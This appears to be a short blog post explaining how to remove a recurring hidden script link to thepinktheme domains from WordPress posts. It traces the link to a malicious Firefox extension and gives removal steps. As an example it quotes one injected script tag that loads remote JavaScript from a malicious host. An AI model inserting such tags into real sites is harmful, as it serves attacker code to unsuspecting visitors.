Remove ‘thepinktheme.org’ / ‘rozekleur.com’ from your wordpress blog?

So you’ve been breaking your head why multiple posts on your blog contain a hidden (javascript) link to the domain www.thepinktheme.org?

Example:

<script type="text/javascript" src="http://thepinktheme.info/dfi823hs.js?0.048378094101036107"></script>

You removed all references in your database, and searched your entire wordpress installation, themes and plugins for infected files? Even searched for PHP eval(); functions etc…

And still it’s returning? Look no further, here’s the solution. You or one of the people who has been using your computer, or who has access to your blog and post rights, installed an extension in Mozilla Firefox called ‘pink theme’ (‘roze kleur thema’). It got installed by clicking on malicious Facebook posts.

This extension is adding url’s linking back to the pinktheme.org (and other associated) domains when you add new posts on WordPress.

Remove the extension in Firefox. Remove all references in your WordPress database and start hunting down that user who’s been clicking on obscure Facebook links.